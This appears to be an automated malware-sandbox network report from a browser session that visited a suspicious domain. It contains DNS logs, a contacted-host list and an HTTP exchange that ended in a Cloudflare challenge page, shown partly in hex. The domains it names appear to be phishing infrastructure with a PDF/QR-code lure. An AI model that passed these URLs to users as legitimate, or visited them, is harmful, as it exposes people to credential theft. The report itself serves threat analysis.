                                                                                                                                                Oct 28, 2024 17:49:12.738600969 CET5667953192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:12.756921053 CET6074453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:12.757098913 CET5004453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:12.764465094 CET53607441.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.764836073 CET53500441.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.768523932 CET53566791.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:12.776473045 CET53517611.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.315824986 CET5694653192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.316155910 CET6151853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.316365957 CET5393253192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.316531897 CET4986053192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.316837072 CET5989853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.316996098 CET5404753192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:15.323740005 CET53498601.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.324261904 CET53540471.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.324280977 CET53615181.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.324881077 CET53598981.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.324898005 CET53569461.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:15.325278997 CET53539321.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.356332064 CET5157853192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:16.356528997 CET5347453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:16.364485025 CET53515781.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:16.367477894 CET53534741.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.315186024 CET4962953192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:17.315474033 CET6510453192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:17.327517033 CET53496291.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:17.327759027 CET53651041.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:30.489716053 CET6433553192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:30.489969969 CET5029753192.168.2.161.1.1.1
                                                                                                                                                Oct 28, 2024 17:49:30.497528076 CET53643351.1.1.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:49:30.498352051 CET53502971.1.1.1192.168.2.16
                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                Oct 28, 2024 17:47:35.619990110 CET192.168.2.161.1.1.1c29a(Port unreachable)Destination Unreachable
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Oct 28, 2024 17:47:27.977171898 CET192.168.2.161.1.1.10x21daStandard query (0)img2.leadong-edm.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:27.977431059 CET192.168.2.161.1.1.10x9c20Standard query (0)img2.leadong-edm.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.143244982 CET192.168.2.161.1.1.10x74e4Standard query (0)img2.leadong-edm.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.143435001 CET192.168.2.161.1.1.10xc12fStandard query (0)img2.leadong-edm.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.980508089 CET192.168.2.161.1.1.10xf24Standard query (0)vokbz-iamgold.mobile-pdfqronline.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.980703115 CET192.168.2.161.1.1.10x8c7eStandard query (0)vokbz-iamgold.mobile-pdfqronline.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:30.478187084 CET192.168.2.161.1.1.10x84b4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:30.478323936 CET192.168.2.161.1.1.10x4e00Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:32.674608946 CET192.168.2.161.1.1.10xa275Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:32.675030947 CET192.168.2.161.1.1.10x7052Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.585235119 CET192.168.2.161.1.1.10x6417Standard query (0)vokbz-iamgold.mobile-pdfqronline.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.585387945 CET192.168.2.161.1.1.10xbc12Standard query (0)vokbz-iamgold.mobile-pdfqronline.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.594513893 CET192.168.2.161.1.1.10xb0c5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.594666958 CET192.168.2.161.1.1.10x912bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:36.756203890 CET192.168.2.161.1.1.10x90c0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:36.756366968 CET192.168.2.161.1.1.10x2499Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:37.159388065 CET192.168.2.161.1.1.10x4250Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:37.159547091 CET192.168.2.161.1.1.10x8b0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:38.850783110 CET192.168.2.161.1.1.10x5588Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.062951088 CET192.168.2.161.1.1.10xe00eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.063132048 CET192.168.2.161.1.1.10xeb4eStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.531933069 CET192.168.2.161.1.1.10x66e6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.532078981 CET192.168.2.161.1.1.10x7063Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:48:30.478482008 CET192.168.2.161.1.1.10x99f4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:48:30.478701115 CET192.168.2.161.1.1.10x2c1Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.548286915 CET192.168.2.161.1.1.10xc1d8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.548425913 CET192.168.2.161.1.1.10xe0ffStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.738257885 CET192.168.2.161.1.1.10x84bfStandard query (0)8sq.w2agn.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.738600969 CET192.168.2.161.1.1.10xbbfdStandard query (0)8sq.w2agn.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.756921053 CET192.168.2.161.1.1.10xfda3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.757098913 CET192.168.2.161.1.1.10x4f0cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.315824986 CET192.168.2.161.1.1.10x8d3aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.316155910 CET192.168.2.161.1.1.10x4dc4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.316365957 CET192.168.2.161.1.1.10x6a32Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.316531897 CET192.168.2.161.1.1.10x15fdStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.316837072 CET192.168.2.161.1.1.10x958cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.316996098 CET192.168.2.161.1.1.10x6c4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:16.356332064 CET192.168.2.161.1.1.10x8861Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:16.356528997 CET192.168.2.161.1.1.10x1813Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:17.315186024 CET192.168.2.161.1.1.10x6497Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:17.315474033 CET192.168.2.161.1.1.10xfd32Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:30.489716053 CET192.168.2.161.1.1.10xc304Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:30.489969969 CET192.168.2.161.1.1.10xceacStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Oct 28, 2024 17:47:28.126391888 CET1.1.1.1192.168.2.160x9c20No error (0)img2.leadong-edm.comimg2.leadong-edm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.127199888 CET1.1.1.1192.168.2.160x21daNo error (0)img2.leadong-edm.comimg2.leadong-edm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.162991047 CET1.1.1.1192.168.2.160x74e4No error (0)img2.leadong-edm.comimg2.leadong-edm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.163032055 CET1.1.1.1192.168.2.160xc12fNo error (0)img2.leadong-edm.comimg2.leadong-edm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.998241901 CET1.1.1.1192.168.2.160xf24No error (0)vokbz-iamgold.mobile-pdfqronline.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:28.998241901 CET1.1.1.1192.168.2.160xf24No error (0)vokbz-iamgold.mobile-pdfqronline.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:29.000827074 CET1.1.1.1192.168.2.160x8c7eNo error (0)vokbz-iamgold.mobile-pdfqronline.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:30.486747980 CET1.1.1.1192.168.2.160x84b4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:32.682213068 CET1.1.1.1192.168.2.160xa275No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:32.682842016 CET1.1.1.1192.168.2.160x7052No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.593935013 CET1.1.1.1192.168.2.160x6417No error (0)vokbz-iamgold.mobile-pdfqronline.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.593935013 CET1.1.1.1192.168.2.160x6417No error (0)vokbz-iamgold.mobile-pdfqronline.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.603411913 CET1.1.1.1192.168.2.160xb0c5No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.603411913 CET1.1.1.1192.168.2.160xb0c5No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.604057074 CET1.1.1.1192.168.2.160x912bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:35.619913101 CET1.1.1.1192.168.2.160xbc12No error (0)vokbz-iamgold.mobile-pdfqronline.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:36.764846087 CET1.1.1.1192.168.2.160x2499No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:36.765001059 CET1.1.1.1192.168.2.160x90c0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:36.765001059 CET1.1.1.1192.168.2.160x90c0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:37.166891098 CET1.1.1.1192.168.2.160x4250No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:37.166891098 CET1.1.1.1192.168.2.160x4250No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:37.168206930 CET1.1.1.1192.168.2.160x8b0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:38.860518932 CET1.1.1.1192.168.2.160x5588No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:39.749326944 CET1.1.1.1192.168.2.160x73d3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:39.749326944 CET1.1.1.1192.168.2.160x73d3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:52.960407019 CET1.1.1.1192.168.2.160x442fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:52.960407019 CET1.1.1.1192.168.2.160x442fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.070350885 CET1.1.1.1192.168.2.160xe00eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.070350885 CET1.1.1.1192.168.2.160xe00eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.070350885 CET1.1.1.1192.168.2.160xe00eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:56.070350885 CET1.1.1.1192.168.2.160xe00eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.539678097 CET1.1.1.1192.168.2.160x66e6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.539678097 CET1.1.1.1192.168.2.160x66e6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.539678097 CET1.1.1.1192.168.2.160x66e6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:47:57.539678097 CET1.1.1.1192.168.2.160x66e6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:48:30.487251997 CET1.1.1.1192.168.2.160x99f4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:48:41.188421965 CET1.1.1.1192.168.2.160x1533No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:48:41.188421965 CET1.1.1.1192.168.2.160x1533No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.556094885 CET1.1.1.1192.168.2.160xc1d8No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.556094885 CET1.1.1.1192.168.2.160xc1d8No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.556859970 CET1.1.1.1192.168.2.160xe0ffNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.568537951 CET1.1.1.1192.168.2.160x15ccNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:11.568537951 CET1.1.1.1192.168.2.160x15ccNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.764465094 CET1.1.1.1192.168.2.160xfda3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.764465094 CET1.1.1.1192.168.2.160xfda3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.764836073 CET1.1.1.1192.168.2.160x4f0cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.768523932 CET1.1.1.1192.168.2.160xbbfdNo error (0)8sq.w2agn.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.776473045 CET1.1.1.1192.168.2.160x84bfNo error (0)8sq.w2agn.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:12.776473045 CET1.1.1.1192.168.2.160x84bfNo error (0)8sq.w2agn.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.323740005 CET1.1.1.1192.168.2.160x15fdNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324261904 CET1.1.1.1192.168.2.160x6c4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324881077 CET1.1.1.1192.168.2.160x958cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324881077 CET1.1.1.1192.168.2.160x958cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324898005 CET1.1.1.1192.168.2.160x8d3aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324898005 CET1.1.1.1192.168.2.160x8d3aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324898005 CET1.1.1.1192.168.2.160x8d3aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.324898005 CET1.1.1.1192.168.2.160x8d3aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.325278997 CET1.1.1.1192.168.2.160x6a32No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:15.325278997 CET1.1.1.1192.168.2.160x6a32No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:16.364485025 CET1.1.1.1192.168.2.160x8861No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:16.364485025 CET1.1.1.1192.168.2.160x8861No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:16.367477894 CET1.1.1.1192.168.2.160x1813No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:17.327517033 CET1.1.1.1192.168.2.160x6497No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:17.327517033 CET1.1.1.1192.168.2.160x6497No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:17.327759027 CET1.1.1.1192.168.2.160xfd32No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                Oct 28, 2024 17:49:30.497528076 CET1.1.1.1192.168.2.160xc304No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                • vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                • a.nel.cloudflare.com
                                                                                                                                                • fs.microsoft.com
                                                                                                                                                • https:
                                                                                                                                                  • challenges.cloudflare.com
                                                                                                                                                  • code.jquery.com
                                                                                                                                                  • 8sq.w2agn.com
                                                                                                                                                  • cdnjs.cloudflare.com
                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.1649707188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:30 UTC685OUTGET /11384/ HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:30 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:30 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                2024-10-28 16:47:30 UTC913INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 68 35 6b 48 79 55 56 59 59 2b 43 53 34 49 65 54 4b 4f 39 59 68 6b 66 50 6b 46 31 6d 43 2b 33 62 48 47 62 6c 58 75 43 79 69 4f 6c 62 48 57 6f 50 33 77 6d 6e 50 44 36 43 66 78 6b 38 35 64 70 79 33 69 33 61 51 75 31 30 46 45 44 35 67 37 76 79 39 7a 79 77 70 52 56 6c 61 37 46 2f 4f 6d 77 6d 4b 78 7a 41 6e 4d 32 69 4a 73 59 3d 24 4a 52 46 42 67 59 37 72 79 38 39 75 4a 61 37 32 57 75 37 69 48 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                                                                Data Ascii: cf-chl-out: h5kHyUVYY+CS4IeTKO9YhkfPkF1mC+3bHGblXuCyiOlbHWoP3wmnPD6Cfxk85dpy3i3aQu10FED5g7vy9zywpRVla7F/OmwmKxzAnM2iJsY=$JRFBgY7ry89uJa72Wu7iHQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 32 33 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                Data Ascii: 23a1<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
